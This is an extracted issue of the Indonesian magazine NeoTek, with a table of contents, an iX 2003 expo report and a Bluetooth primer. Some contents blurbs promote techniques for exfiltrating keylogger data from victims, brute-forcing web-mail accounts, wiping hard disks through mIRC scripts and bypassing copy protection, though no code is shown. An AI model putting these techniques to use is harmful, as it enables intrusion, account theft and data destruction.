P. 1
Neotek Vol. IV - No. 01

Neotek Vol. IV - No. 01

|Views: 663|Likes:
Published by MA Rody Candera
NeoTek Magazine about Computer and Internet
NeoTek Magazine about Computer and Internet

More info:

Published by: MA Rody Candera on Mar 31, 2010
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less

08/15/2013

pdf

text

original

NeoSoft

Online Game Gratis!
Asiik... Demo Version-nya bisa dipakai untuk online game Battle.Net

idak heran bila WarCraft III: Reign of Chaos menyandang gelar Game of the Year 2002. Dibandingkan real time strategy lain seperti Rise of Nations ataupun Age of Mythology, game dari Blizzard Entertainment ini lebih adiktif!

T

Bukan itu saja, selain bisa untuk LAN Gaming, WarCraft III dapat digunakan untuk online gaming ke Dacom server yang tersedia gratis. Juga gratis untuk trial version-nya. Memang trial version tidak men-support LAN dan hanya menyediakan Orc campaign dari empat ras yang menjadi subyek dalam game ini: orc, human, undead, dan elves. Untuk memahami ceritanya, lihat di sini: http://www.blizzard.com/war3/ Persyaratan komputer untuk memainkan game ini juga tidak terlalu tinggi:
400 MHz Pentium II or equivalent 128 MB of RAM 8 MB 3D video card (TNT, i810, Voodoo 3, Rage 128 equivalent or better) with DirectX® 8.1 support 700 MB HD space 4X CD-ROM drive

Untuk versi demo tidak dibutuhkan CD ROM, tetapi full version membutuhkan CD ROM-nya tetap terpasang (dapat diakali dengan Virtual CD) dan untuk dapat terhubung ke Battle.Net, serial number full version akan di-cek dulu. Tapi demo version-nya di Battle.Net malah gratis habisss....

HomePage

amkm
anda meminta kami mendownload
tidak dilanjutkan lagi

Salam!
Dengan Bluetooth Membentuk PAN

Tujuan AMKM adalah untuk mendapatkan masukan software apa di Internet yang menarik bagi pembaca dan dapat dishare dengan pembaca lain. Keterbatasan tempat pada CD NeoTek membuat program ini tidak efektif dan terlalu banyak yang tertunda untuk dapat dimuat dalam CD NeoTek

• Memang jangkauan Bluetooth lebih pendek dibanding saudaranya WLAN yang sama-sama menggunakan frekuensi radio 2,4 GHz, tetapi Bluetooth mempunyai kelebihan fleksibilitas serta praktis dapat membentuk network dari perangkat elektronik apa saja yang terpikir oleh anda.

AN di sini bukan nama partai politik, melainkan Personal Area Network, yang bukan hanya terdiri dari komputer-komputer, melainkan juga segala jenis perangkat elektronik yang Bluetooth-enabled seperti handphone, printer, audio, dan mungkin kelak peralatan rumahtangga juga.

P

Redaksi redaksi@neotek.co.id

Bagaimana menghubungi N EOTEK?
KONTRIBUSI ARTIKEL
redaksi@neotek.co.id

ADMINISTRASI IKLAN
Tel. 021-5481457 Tel. 021-5481457

SURAT PEMBACA

Fax. 021-5329041

support@neotek.co.id

Jadi layanan ini terpaksa dihentikan dengan bertahap tetap akan memenuhi permintaan yang sudah masuk.

SIRKULASI NEOTEK ALAMAT REDAKSI
4 Cairnhill Rise #05-01 The Cairnhill Singapore 229740 Telp. +65-67386482 kosasih@indo.net.id

WEBMASTER

webmaster@neotek.co.id

PEMASARAN
#neoteker

pemasaran@neotek.co.id

CHATROOM DI DALNET MILIS PARA NEOTEKER

http://groups.yahoo.com/group/majalahneotek

Vol. IV No. 01 NeoTek

1

Daftar Isi

Daftar Isi
FOKUS VOL. IV NO. 1

NeoTek Vol. IV No. 1
NeoTutor
15
pJava: Symbian OS 7 UIQ SDK
Sony Ericsson P800 merupakan handphone paling canggih di kelasnya dengan penerapan Symbian OS 7. Kenali tool untuk pengembangannya

Dengan Bluetooth Membentuk PAN

18
Dial-Up Internet GPRS Ponsel Bluetooth

pJava: Membuat Sendiri Aplikasi pJava

NeoStart
6
Memahami Bluetooth Ko-eksistensi dengan WLAN
Bluetooth mempunyai kesamaan dengan WLAN, yaitu teknologi wireless yang memanfaatkan gelombang radio 2,4 GHz, tetapi hanya sampai di situ saja kesamaannya. Perbedaannya jaluh lebih banyak karena dirancang untuk tujuan yang berbeda.

11

Membuat aplikasi pJava untuk platform Symbian OS 7 lengkap sampai menjadi file SIS (Symbian Installation).

Sony Ericsson T610 dan Nokia 3650 selain mendukung GPRS juga mendukung Bluetooth. Koneksi ke Internet lewat handphone menjadi semakin nyaman dengan adanya Bluetooth.

23 UML Builder: Membuat ‘VMWare’ Sendiri
Kesulitan karena harus membayar lisensi apabila menggunakan virtual machine VMWare? Mengapa tidak buat sendiri saja dengan UMLBuilder?

12

Pengantar Bluetooth untuk Java

Dalam J2ME terdapat dua bagian yang mendukung Bluetooth, Java Bluetooth Stack dan Bluetooth API. Kenali tool untuk pengembangan Bluetooth pada Java.

26

SMTP Engine untuk Keylogger

Teknik cerdik untuk mendapatkan secara otomatis ‘hasil panen’ dari keylogger yang sudah kita pasang di komputer korban dengan built-in SMTP engine.

Situs NeoTek
Link Langsung
Kunjungi situs-situs yang dibahas di majalah NeoTek dengan sekali klik lewat situs NeoTek.

www.neotek.co.id neotek.kpone.com.sg

NeoTekno
36
Mencuri Account Web-Mail
Kembali membahas konsep dasar password cracking dengan cara bruteforce (coba-coba). Kali ini dengan sasaran web-mail account.

Jadikan situs NeoTek sebagai pangkalan Anda berselancar

Layanan Rupa-rupa NeoTek
Channel #neoteker di Dalnet Ngobrol ramai-ramai sesama NeoTeker Web Chat Room Kini tidak usah jauh-jauh untuk ngobrol langsung dengan sesama NeoTeker Mailing List Ini yang paling ramai. Segera ikutan berbagi pengalaman berinternet! NeoTeker Official Portal http://www.neoteker.or.id Situs komunikasi antar Neoteker. Neoteker Internet Radio http://dj.neoteker.or.id:8000

NeoTek versi PDF

Kehabisan NeoTek di kota Anda? Dapatkan saja versi PDF-nya. Gratis!

40

Download

Motherboard & Dasardasar Perakitan

Tersedia juga download di situs NeoTek selain dari situs aslinya

Memilih motherboard yang sesuai akan mengurangi frustrasi apabila kelak anda ingin meng-upgrade komputer anda. Kenali pelbagai port dan bus serta chipset, bukan hanya prosesor saja.

2

NeoTek Vol. IV No. 01

Daftar Isi

NeoStyle
28
Video Editing: Membentuk Clip dengan Cutting
Melanjutkan bahasan mengenai video editing. Setelah Encoding kini dibahas cara membentuk clip-clip Video untuk kelak digabungkan menjadi video yang menarik dengan proses Cutting.

32

Dengan mIRC Merusak Harddisk Orang

NeoSoft
0
WarCraft III
Reign of Chaos
Demo version yang paling gres, yang memungkinkan online game secara gratis!

Menunjukkan salah satu bahaya script mIRC kalau anda sampai tidak memahami cara perlindungan diri yang paling mendasar: Orang lain dapat saja menanamkan script pada program mIRC anda yang akan merusak sistem Windows pada hard disk anda misalnya dengan menjalankan perintah deltree lewat mIRC!

NeoProfil
3
Editorial Office
4 Cairnhill Rise #05-01 The Cairnhill Singapore 229740 Telp. +65-67386482

30

Dasar-dasar Pengamanan mIRC

34

Chat Terenkripsi: SSL pada mIRC

Mungkin anda pernah dengar bahwa IRC merupakan salah satu sarana di Internet yang berbahaya. Paling tidak anda perlu memahami cara-cara paling dasar untuk mengamankan diri dengan memeriksa apakah ada script liar yang sedang berjalan.

Sebagai penangkal terhadap kegiatan iseng ‘nguping’ pembicaraan kita pada IRC seperti sudah dua kali dibahas di NeoTek, yaitu mengenkripsi komunikasi kita dengan SSL. Sayang channel #neoteker menggunakan Dalnet yang masih belum dienkripsi.

Business Office
Gedung Cahaya Palmerah 503 Jl. Palmerah Utara III No. 9 Jakarta 11480 Telp. 021-5481457 Fax. 021-5329041

NeoReview
45
Virtual CD 5.0 CD ROM Diganti CD ‘Bohongan’ Saja
Pernah jengkel karena tidak bebas memainkan game karena program selalu minta CD ROM ada dalam drive? Gunakan saja Virtual CD 5.0 untuk mengganti CD ROM dengan CD ‘bohongan.’ Game kini dapat diinstal di banyak tempat dan dimainkan tanpa harus ada CD ROM dalam CD drive.

Instalasi virtual CD pada dasarnya adalah membentuk satu atau beberapa virtual CD yang akan dianggap oleh Windows seolah-olah memang anda memasang hardware sungguhan.

45

Instalasi Virtual CD
Pemimpin Umum
Fachri Said

Pemimpin Redaksi
Kosasih Iskandarsjah

Redaktur Ahli
Onno W. Purbo Michael S. Sunggiardi

47

Membentuk CD Image & Menjalankannya

Pemimpin Usaha
Fahmi Oemar Dadang Krisdayadi

CD ROM game dapat dibuatkan imagenya oleh virtual CD dan image ini dapat dimasukkan ke dalam virtual CD seperti layaknya memasukkan CD ROM sungguhan kedalam CD drive sungguhan.

Redaktur Pelaksana
Gianto Widianto

Sekretaris Redaksi
Marni

NeoRagam

NeoTek Vol. IV No. 02 Password Cracker Buatan Sendiri
Belajar Visual Basic akan lebih asik kalau ada nakal-nakalnya sedikit, seperti membuat password cracker ini.

Webmaster
Supriyanto

4 5
Inbox

Klak Klik WarCraft III: Reign of Chaos Laporan dari iX 2003 Security Sebagai Lahan Bisnis Game Serius di Nokia N-Gage Linux Semakin Kokoh Sebagai Solusi Bisnis Product Lifecycle Management NmN NeoTeker Menjawab NeoTeker Daftar Isi CD NeoTek

Sirkulasi
Hedhi Sabaruddin, Denny

Adm. Langganan
KRISHNAdiSTRIBUTOR

Helix Mobile Producer
Kenali tool komprehensif untuk mengembangkan mobile content ini, termasuk cara mengakalinya dengan menghilangkan watermark pada demo version-nya.

Iklan dan Promosi
Gianto Widianto

Keuangan
Aswan Bakri

44 49

Bank
Bank BNI a.n. PT NeoTek Maju Mandiri No. rekening 070.001709720.001 Bank BCA Matraman
(khusus untuk langganan)

CD 48 BluetoothOS 7 UIQ SDK Symbian Circle Virtual CD XP

a.n. Boedi Krishnadi No. rekening 342-239-1611

Vol. IV No. 01 NeoTek

3

NeoRagam

Klak Klik
GAME BULAN INI
WarCraft III:
Reign of Chaos

LAPORAN DARI iX 2003, SINGAPORE EXPO 1-3 OKTOBER 2003

Security Sebagai Lahan Bisnis
elas sekali terlihat pergeseran peran perusahaan software yang tadinya berkiprah dalam produk dan jasa anti-virus menjadi penyedia produk dan jasa keamanan jaringan dan komputer. Stand yang mencolok serta penuh seminar adalah stand dari Symantec (yang terkenal dengan Norton Anti Virus) dan McAfee (juga antivirus). IDS dan IPS Mereka tidak mempromosikan lagi anti virus (semua orang sudah tahu), melainkan IDS (Intrusion Detection System) serta IPS (Intrusion Prevention System). Apabila Symantec memperkenalkan produk-produk IDS untuk network, host, dan perimeter, maka McAfee memperkenalkan konsep IPS yang memanfaatkan Gigabyte Ethernet backbone. Sun Microsystems Sun menyajikan package dari Snort 2.0 pada sistem operasinya, Solaris, tetapi yang menarik dari Sun adalah produk terbarunya yang justru untuk desktop:

100,165 MB

J

udah 15 tahun sejak perang antara Orc dengan Manusia berakhir, namun perdamaian yang terjadi bukanlah perdamaian sejati dan satu sama lain tetap saling tidak percaya.

S

Manusia yang digjaya semakin puas diri dan secara perlahan klan-klan Orc yang pernah dikalahkan manusia mengelompok kembali di bawah panji-panji pemimpin mereka yang baru. Namun kini muncul bayangan yang lebih gelap, yang menabuhkan genderang perang antara semua ras yang ada Manusia, Orc, Night Elves, dan Undead. Undead yang menyeramkan adalah angkatan perang dari mayat-mayat hidup yang dikuasai oleh Ner'zhul, Lich King, dari tahta bekunya di Northrend. Walaupun Ner'zhul dan Undead-nya terikat pada kehendak the Burning Legion, Lich King ini terusmenerus berusaha membebaskan diri dan membahas dendam terhadap setan-setan yang menyebabkannya menjadi sedemikian terkutuk.
Pentium II 400, RAM128 8MB 3D video card, 700MB hard disk, 4x CD ROM, DirectX 8.1

Sun Desktop System. Produk ini dibentuk dengan mengkombinasi fitur-fitur desktop dari SuSE Linux dengan Star Office 7.0. Dengan label harga USD99, diperkirakan akan membuat Sun mengharuskan menarik Star Office 7.0-nya yang dijual dengan harga tidak terlalu berbeda. Microsoft Microsoft membagi-bagikan Security Readiness Kit 4.1, namun tidak ada staf mereka yang bisa ditanya, sebab yang justru paling menyedot perhatian adalah Mitac DigiWalker 8380, smartphone dengan sistem operasi MS Smartphone 2003. Kelihatannya setelah mengambil sebagian pasar Palm OS dengan Windows CE dan kini MS PocketPC 2003, Microsoft juga serius menghadang Nokia yang sukses dengan Symbian OS-nya. Fitur smartphone memang menggiurkan: GPRS Class 10, kamera, dan semi-PDA. Kelemahannya (seperti produk Microsoft lain) adalah hang kalau terlalu banyak aplikasi yang dibuka. air dan disimpan dalam memori, terdapat game dalam bentuk MultiMediaCard dan dijual dengan SGD58 dan SGD68. Bandingkan dengan harga Java game yang hanya SGD3 atau SGD6, game dalam media MMC ini menjadi phonegame termahal yang tersedia. Nokia N-Gage sendiri dijual dengan harga SGD548 dan di dalamnya tidak terdapat preloaded game apapun, tetapi anda dapat memilih satu game dalam MMC sebagai ‘bonus,’ yaitu Tomb Raider atau Pandemonium. Apabila sewaktu asik-asiknya bermain ada telepon masuk, maka game dapat di-pause terlebih dahulu.

Wireless Java Tool Borland tampil dengan Borland JBuilder-nya yang merupakan tool lengkap untuk pengembangan wireless Java, mulai dari aplikasi sampai manajemen portalnya. Produk serius dengan harga single user SGD3000, namun CD trial version-nya dapat diperoleh gratis. GPS dan LBS Global Positioning System kelihatannya akan menjadi trend selanjutnya untuk aplikasi handphone atau PDA. Selain GPS seperti Garmin eTrex yang sudah semakin terjangkau (dibawah SGD500), Palm dengan GPS Upgrade Kit NavMan-nya bekerja sama dengan Agis untuk peta di Singapore, Malaysia, Thailand, dan Indonesia. Penetapan lokasi selain dengan GPS dapat dengan LBS (Location Based Services) yang lebih murah dan akurat, walaupun terbatas jangkauannya sejauh jangkauan operator seluler. Sementara baru untuk pelangan Starhub di Singapore. Servis dengan nama MecWise ini dibawakan oleh StarVision. Selain sebagai handphone dan game device, Nokia N-Gage juga berfungsi sebagai music player dan FM radio. Juga mendukung GPRS dan terdapat built-in Bluetooth. Game dalam MMC yang sudah tersedia sekarang di antaranya:
Tomb Raider. Suatu adventure game dengan Lara Croft sebagai jagoannya. Pandemonium. Suatu action adventure 3D dengan setting di kota kuno Lyr. Super Monkey Ball. Anda bermain bola bersama seekor monyet cerewet. MotoGP. Untuk menguji keterampilan anda mengendarai sepeda motor. Puyo Pop. Menjejerkan pola warna-warna untuk membuatnya menghilang.

Game Serius di Nokia N-Gage
Siapa sangka kalau Nokia sampai benar-benar menghubungi para pengembang game ‘serius’untuk game pada Nokia N-Gage, suatu gamephone dengan Symbian OS 6.0 Kini dengan Nokia N-Gage, handphone mempunyai layar cukup besar (176 x 208 pixel) untuk game sungguhan, bukan sekedar menghidupkan game lawas dari jaman komputer 8-bit. Selain memainkan Java game sederhana yang dapat di-download over-the-

4

NeoTek Vol. IV No. 01

NeoRagam
LAPORAN DARI iX 2003, SINGAPORE EXPO 1-3 OKTOBER 2003

Linux Semakin Kokoh Sebagai Solusi Bisnis
alah satu trend yang juga jelas terlihat adalah semakin kukuhnya Linux sebagai suatu solusi bisnis. Memang pada pameran ini tidak tampak adanya IBM yang menggunakan Linux dalam parallel processing di mesin maingframe, tetapi kita bisa mendapatkan solusi memparalelkan banyak PC yang masingmasing menjalankan Linux membentuk suatu supercomputer. Linux untuk Networking: Thin Client Computing Pada jaman awal komputer dikenal adanya dumb terminal yang hanya digunakan untuk memasukkan data yang diproses semuanya pada komputer mainframe atau mini. Adanya PC menjungkirbalikkan semua ini dan segala macam hal dapat dikerjakan sendiri di PC, sehingga timbul istilah front-end system yang artinya kira-kira dari depan sampai belakang dikerjakan sendiri. Kini dengan semakin lazimnya networking, konsep kuno itu kembali lagi dengan nama baru: thin client.

S

Pada arsitektur thin client segala hal diproses di server, sedangkan client (kali ini disebut terminal saja, bukan dumb terminal) dapat hanya untuk mengetikkan data saja (kalau mau untuk memproses juga bisa). Apabila untuk thin client computing pada sistem Windows dikenal dari produk Citrix Metaframe, maka pada L Linux dikenal dengan LTSP (Linux Terminal Server Project). Teknologi thin client kini sudah matang dan sudah ditawarkan sebagai suatu solusi bisnis. Linux untuk Mainframe: Linux@CA Computer Associates yang terkenal dengan produk untuk enterprise kini menyajikan juga Linux enterprise solution. Business Mangement portfolio dari CA yang menggunakan Linux mencakup: Unicenter suatu infrastructure management solution yang platform independent.

eTrust suatu security management solution yang mencakup pemisahan kekuasaan root account serta perlindungan terhadap virus. Brightstor suatu storage solution untuk manajemen data. CleverPath portal solution untuk business-intelligence; memberikan informasi yang sesuai untuk orang yang sesuai pula. Allfusion suatu life cycle management solution yang menyesuaikan sasaran bisnis dengan implementasi TI. Advantage suatu solusi untuk membangun, menerapkan, serta mengelola aplikasiaplikasi bisnis. Ribuan Linux Virtual Machine Semua di atas dapat dijalankan pada mainframe zSeries atau S/390. Mainframe mampu menjalankan ribuan Linux virtual machine yang menjalankan berbagai macam fungsi.

Product Lifecycle Management
alam dunia TI yang berkembang begitu pesat, produk baru dapat mematikan produk lama dalam waktu sekejap, padahal merancang produk sampai produksi dan memasarkannya memakan sumber daya yang tidak sedikit, dan waktu adalah pembatasnya. P Untuk itulah Product Lifecycle Management (PLM) menjadi sangat penting untuk manufaktur seperti Fujitsu. Dalam pameran iX 2003, Fujitsu tidak memamerkan produk, V melainkan VPS (Virtual Product Simulator) yang merupakan inti dari PLM. Bukan Hanya Quality, Cost, dan Delivery Dalam rancangan produk sekarang, komitmen diberikan bukan hanya pada Quality (Q), Cost (C), dan Delivery (D), melainkan juga pada Environment (E), yang meningkatkan kebutuhna jam kerja demi menguji produk yang ramah lingkungan. Model 3D pada Berbagai Bagian Pengembangan Visualisasi dengan model 3D memungkinkan membuat tiruan digital (digital mockup) dari produk sebenarnya. Untuk ini digunakan VPS yang menyediakan aplikasi yang digunakan dalam berbagai bagian seperti perencanaan, pengembangan, perencanaan proses, maintenance, recycle, dll. Siklus PLM Siklus PLM terdiri dari: • planning • design

D

• firmware • ecology • process planning • manufacturing • manuals • maintenance • sales dan kembali lagi ke planning. Compatible dengan Berbagai CAD Software VPS compatible dengan berbagai program CAD yang ada untuk kelas industri seperti: ICAD/MX, Unigraphics, Pro/Engineer, Solid Edge, Solid Designer, i-IDEAS, Mechanical Desktop, STL, ICAD/SX, CATIAv4, SolidWorks, dan VRML 2.0. Kebutuhan Sistem
VPS dapat dijalankan pada komputer paling tidak dengan spesifikasi sebagai berikut: CPU Pentium II 333 MHz atau lebih tinggi 128 MByte RAM atau lebih Windows XP (konbektor IO tidak dijamin) Windows 2000 (Service Pack 2 atau di atasnya) OpenGL Accelerator (dianjurkan) VRAM 8 Mbyte atau lebih (dianjurkan)

Bagi yang berminat untuk pengembangan produk secara terpadu ini dapat memperoleh VPS dari:
Fujitsu Asia Pte Ltd 20 Science Park Road #03-01, Teletech Park Singapore Science Park II, Singapore 117674 Telp. +65-67786466

Vol. IV No. 01 NeoTek

5

NeoStart

Ko-eksistensi dengan WLAN
Bluetooth dan Wireless LAN sama-sama merupakan teknologi komunikasi wireless yang memanfaatkan gelombang radio 2,4 GHz namun keduanya dirancang untuk pemanfaatan yang berbeda dan dapat hidup berdampingan satu sama lain.
yang dipakai sehari-hari dalam produk elektronika. Ada yang mungkin langsung mengasosiasikannya dengan wireless headset yang digunakan sebagai aksesori posel yang Bluetooth-enabled. Namun manfaat bluetooth jauh lebih dari itu dan diperkirakan dalam waktu tidak terlalu lama akan hadir di segala macam peralatan elektronik. Bluetooth seperti juga wi-fi (dikenal sebagai wireless LAN) menggunakan frekuensi radio 2,4 GHz namun dengan daya yang jauh lebih kecil. Daya jangkau bluetooth paling jauh hanya 100 meter (Class 1) sedangkan pada umumya hanyalah 10 meter. Namun berbeda dengan wi-fi, Bluetooth memungkinkan koneksi antar-piranti elektronik apa saja dan bukan cuma komputer. Bluetooth disini dapat digunakan untuk membentuk PAN (personal area network) antara piranti-piranti yang digunakan oleh seseorang (komputer, handphone, printer, PDA, kamera, bar-code reader, vending machine, dan bahkan kelak piranti audio-video maupun piranti dapur).

M E MAHAM I B LU ETOOTH

B

LUETOOTH MUNGKIN KINI BELUM MERUPAKAN ISTILAH

Contoh Pemakaian Bluetooth
Pemanfaatan Bluetooth dapat sangat luas, namun yang sudah berjalan sekarang ini di antaranya: Wireless headset Pemanfaatan Bluetooth yang utama adalah dalam dunia handphone. Hampir semua pabrikan handphone sekarang

ini sudah mengeluarkan versi handphone yang dilengkapi Bluetooth. Hal ini memungkinkan penggunaan wireless headset bersamaan dengan handphone tersebut. Energi frekuensi radio yang dipancarkan piranti Bluetooth jauh lebih kecil dibandingkan handphone itu sendiri. Selain untuk kesehatan, piranti wireless headset memungkinkan seseorang menggunakan handphone-nya walaupun handphone itu tersimpan di dalam tas atau koper. Internet bridge Teknologi wireless Bluetooth juga memungkinkan handphone untuk memanfaatkan kemampuan Dial-Up Networking yang ada pada PC. Memungkinkan kita untuk terhubung ke Internet tanpa koneksi fisik ke line telepon. Dalam hal ini fungsi yang didapat serupa dengan handphone yang terhubung ke PC melalui port infra merah, tetapi berbeda dengan infra merah, handphone yang dipakai untuk modem dalam koneksi ini tidak harus dipasang pada sudut pandang port infra merah PC. Bahkan tidak harus dikeluarkan dari saku sama sekali. File exchange Bluetooth dapat membentuk suatu network tanpa membutuhkan infrastruktur (pada wi-fi infrastruktur dapat berupa access point). Dengan cara demikian apabila misalnya dalam suatu seminar sang pemrasaran ingin memberikan berkas presentasinya pada hadirin, dia cukup mengaktifkan Bluetooth pada komputernya. Peserta yang mempunyai piranti

Instalasi Bluetooth Device pada PC

1

INSTALASI BLUETOOTH DRIVER
Dalam paket Bluetooth yang anda beli sudah terdapat bluetooth driver, namun kadang-kadang bukan versi terakhir. Pada CD NeoTek terdapat driver Bluetooth versi terbaru dan versi lama tidak usah anda gunakan. Untuk menjalankannya double klik bsetup.exe

2

ADA TIGA VERSI DRIVER
Terdapat tiga versi Bluetooth driver, yaitu untuk USB Dongle (v. 1.3.2.7), CF Bluetooth (v. 1.3.2.7), dan untuk WinCE 3.0 & PocketPC 2003 (v. 1.3.1). Pilih yang sesuai (dalam hal ini USB Dongle) dan proses instalasi berjalan. Apabila ada versi lama, akan di-uninstall terlebih dahulu.

3

DIPERLUKAN WINDOWS CD
Persiapkan Windows CD. Dalam instalasi mungkin akan dibutuhkan. Setelah selesai klik kanan pada icon Bluetooth di toolbar dan masukkan Indentity. Dalam contoh ini adalah kosasih_laptop dengan tipe Laptop. Informasi ini yang akan terlihat oleh piranti Bluetooth lain.

6

NeoTek Vol. IV No. 01

NeoStart
Bluetooth lain dapat mengenali komputernya dan dapat melakukan file transfer seizin pemiliknya (dengan memasukkan password yang disepakati bersama). Semua itu tanpa harus men-setting komputer-komputer yang ada agar ada dalam satu domain seperti apabila menggunakan wi-fi. Lebih jauh lagi hal ini dapat dilakukan bukan hanya untuk sesama komputer, melainkan juga dengan PDA atau handphone yang Bluetooth-enabled. Sinkronisasi Bluetooth memungkinkan sinkronisasi antar-piranti. Sebagai contoh komputer desktop dapat secara wireless mensinkronisasi daftar alamat, informasi tugas, kalender., dan lainnya dengan handphone, PDA, ataupun laptop. Printing Printer dan notebook yang sudah dilengkapi dengan Bluetooth sudah tersedia. Komputer atau PDA yang Bluetoothenabled dapat langsung mengenali printer yang juga Bluetooth-enabled dan dapat mencetak tanpa harus repot-repot men-setup printer tersebut. Dibandingkan dengan konfigurasi wi-fi yang relatif sederhana, konfigurasi Bluetooth network lebih beragam dan dinamis. Suatu Bluetooth network terus-menerus terbentuk, berubah, ataupun hilang sejalan dengan masuk dan keluarnya piranti-piranti Bluetooth dari jangkauan satu sama lainnya. Juga karena piranti Bluetooth bermacam-macam jenisnya, maka ada banyak cara piranti-piranti Bluetooth dapat berinteraksi.

Service Discovery
Konsep service discovery digunakan untuk menentukan apa jenis piranti Bluetooth yang ada dan service yang diinginkan ataupun ditawarkan oleh piranti-piranti ini. Apabila suatu piranti Bluetooth memerlukan suatu service, maka piranti ini akan memulai suatu proses discovery dengan mengirimkan query ke piranti-piranti Bluetooth lainnya serta informasi yang dibutuhkan untuk membentuk koneksi dengan piranti-piranti lain itu. Begitu piranti Bluetooth lain ditemukan dan komunikasi telah terbentuk, maka SDP (Service Discovery Protocol) akan digunakan untuk menentukan service-sercice apa saja yang didukung dan koneksi jenis apa yang harus dilakukan. Agar hal ini terjadi piranti Bluetooth lain itu harus mau dikenali (piranti Bluetooth dapat di-set Invisible yaitu dapat mengenali piranti lain, tetapi tidak akan bereaksi terhadap query piranti lain), dan topologi serta hirarki internal dari suatu Bluetooth network yang terbentuk tergantung pada aplikasi yangt tersedia.

Cara Kerja Bluetooth
Suatu piranti Bluetooth dapat berperan sebagai master atau sebagai slave, tergantung pada skenario penerapannya. Bluetooth menerapkan FHSS (frequency hopping spread spectrum) untuk berkomunikasi. Jadi agar beberapa piranti Bluetooth dapat mengenali satu sama lain, semuanya harus bersinkronisasi pada hopping sequence yang sama. Master men-set dan mengaktifkan hopping sequence dan para slave mensinkronisasi dirinya dengan master. Suatu master dengan beberapa slave (satu sampai tujuh) membentuk yang disdebut piconet. Slave dalam suatu piconet hanya berkomunikasi dengan master-nya. Dua atau lebih piconet dapat dihubungkan membentuk suatu scatter net. Apabila suatu piranti berada dalam lebih dari satu piconet, maka piranti itu harus berpindah-pindah dalam sinkronisasinya dengan master dari piconet yang dikomunikasikannya.

ACL dan SCO Link
Begitu koneksi antara dua piranti telah terjadi, suatu ACL A (Asynchronous Connection-Less) link akan terbentuk diantara keduanya. ACL link menyediakan komunikasi packet-switch dan merupakan link yang paling umum untuk menangani lalu-lintas data. Master memiliki opsi untuk mengubah ACL link menjadi SCO (Synchorous Connection Oriented) link. Suatu SCO S Q link menyediakan fitur QoS (Quality of Service) dengan

Service Discovery Terhadap Piranti Bluetooth

4

MY BLUETOOTH PLACES
Setelah instalasi akan terbentuk My Bluetooth Places dengan icon pada desktop maupun taskbar. Di dalamnya terdapat Bluetooth Setup Wizard, Entire Bluetooth Neighborhood, Find Bluetooth Devices, My Device, dan Bluetooth Exchange Folder.

5

MY DEVICE & NEIGHBORHOOD
My Device menunjukkan service yang disediakan komputer kita sendiri. Untuk mendapatkan piranti Bluetooth lain dalam jangkauan gunakan Find Bluetooth Devices dan selanjutnya akan terdaftar dalam Entire Bluetooth Neighborhood. Pada contoh: PC dan dua ponsel.

6

SERVICE DISCOVERY
Double click masing-masing icon Device untuk mendapatkan service apa saja yang disediakan masingmasing device. Service pada PC pada dasarnya serupa, sedangkan pada ponsel tergantung ponselnya. Service pada Sony Ericsson T610 lebih banyak daripada Nokia 3650.

Vol. IV No. 01 NeoTek

7

NeoStart
jalan mencadangkan time slot untuk transmisi informasi yang kritis-waktu seperti suara. Suatu piconet dapat mempunyai sampai tiga buah voice-link yang full-duplex. Banyak dan bervariasinya model-model pemanfaatan piranti Bluetooth mengakibatkan diperlukannya berbagai jenis protokol dan fungsi yang berbeda yang perlu diimplementasikan pada berbagai model penggunaan. Untuk memastikan agar semua model penggunaan berjalan di antara banyak piranti dari berbagai pabrikan, protokol-protokol ini harus distandardisasi. Profil Bluetooth adalah definisi-definisi standar untuk berbagai protokol dan fungsi yang diperlukan untuk suatu tugas tertentu. Standar Bluetooth 1.1 terdiri dari 13 profil, yang akan terus ditambahkan. Beberapa profil bersifat dependen pada profil yang lain. kan oleh profil-profil lain untuk menjalankan fungsi-fungsi seperti Object Push, File Transfer, dan Synchrorization. Object Push Profil ini digunakan untuk pertukaran obyek-obyek kecil seperti misalnya electronic calling card. File Transfer Profil ini digunakan untuk mentransfer berkas-berkas antara dua piranti Bluetooth. Synchorization Profil ini digunakan untuk mensinkronisasi kalender dan informasi alamat diantara piranti-piranti. Profil-profil lain yang belum menjadi bagian dari standar mencakup Basic Printing Profile untuk memfasilitasi pencetakan email teks, pesan pendek dari SMS, maupun dokumendokumen yang sudah diformat; Hands Free Profile yang memungkinkan handphone digunakan dengan piranti hands-free dalam mobil; Basic Imaging Profile yang memungkinkan piranti Bluetooth untuk menegosiasikan ukuran dan meng-encode gambar-gambar yang dipertukarkan; dan Hardcopy Cable Replacement Profile yang digunakan oleh piranti-piranti seperti komputer laptop dan desktop yang memanfaatkan printer driver.

Beberapa Profil Dasar Bluetooth
General Access Profile (GAP) Profil ini diperlukan oleh semua model penggunaan dan mendefinisikan cara men-discover adanya piranti Bluetooth dan menghubungkan satu dengan lainnya, selain juga mendefinisikan security protocol. Semua piranti Bluetooth harus sejalan paling tidak dengan GAP ini agar interoperatibilitas dengan piranti lain dapat terlaksana. Service Discovery Application Profile (SDAP) SDAP menggunakan bagian dari GAP untuk mendefinisikan discovery dari service-service untuk piranti-piranti Bluetooth. Serial Port Profile Profil ini mendefinisikan cara setup dan koneksi port-port serial maya antara dua piranti. Emulasi kabel serial ini kemudian dapat digunakan untuk tugas-tugas seperti transfer data dan pencetakan. Generic Object Exchange Profile (GOEP) GOEP bersifat dependen terhadap Serial Port Profile dan digunakan oleh aplikasi-aplikasi untuk menangani pertukaran obyek. Pada gilirannya, kemampuan ini dimanfaat-

Power Level dan Daya Jangkau
Kebanyakan piranti Bluetooth, tergantung pada baterai untuk sumber dayanya, dan ditetapkan sebagai piranti kelas 3 yang dirancang dan beroperasi pada power level 0 dBm (1 mW), yang mempunyai daya jangkau sampai 10 meter. Piranti kelas 2 dapat memanfaatkan output power 4 dBm (2,5 mW), dan piranti kelas 1 dapat memanfaatkan output power sampai 20 dBm (100 mW). Piranti kelas 1 mempunyai jangkauan sampai 100 meter. Piranti Bluetooth kelas 2 dan 3 secara opsional dapat mengimplementasikan adaptive power control. Mekanisme ini memungkinkan suatu Bluetooth radio menurunkan dayanya sampai ke suatu level minimum sekedar untuk mempertahankan link, yang berarti menghemat daya dan me-

Konfigurasi Bluetooth

7

KONFIGURASI PADA PC SENDIRI
Klik kanan pada icon Bluetooth di task bar dan pilih Advanced Configuration. Akan tampil jendela Bluetooth Configuration yang pada tab General menunjukkan bahwa yang sedang kita telaah adalah konfigurasi Bluetooth pada komputer lokal kita sendiri.

8

LOCAL SERVICES
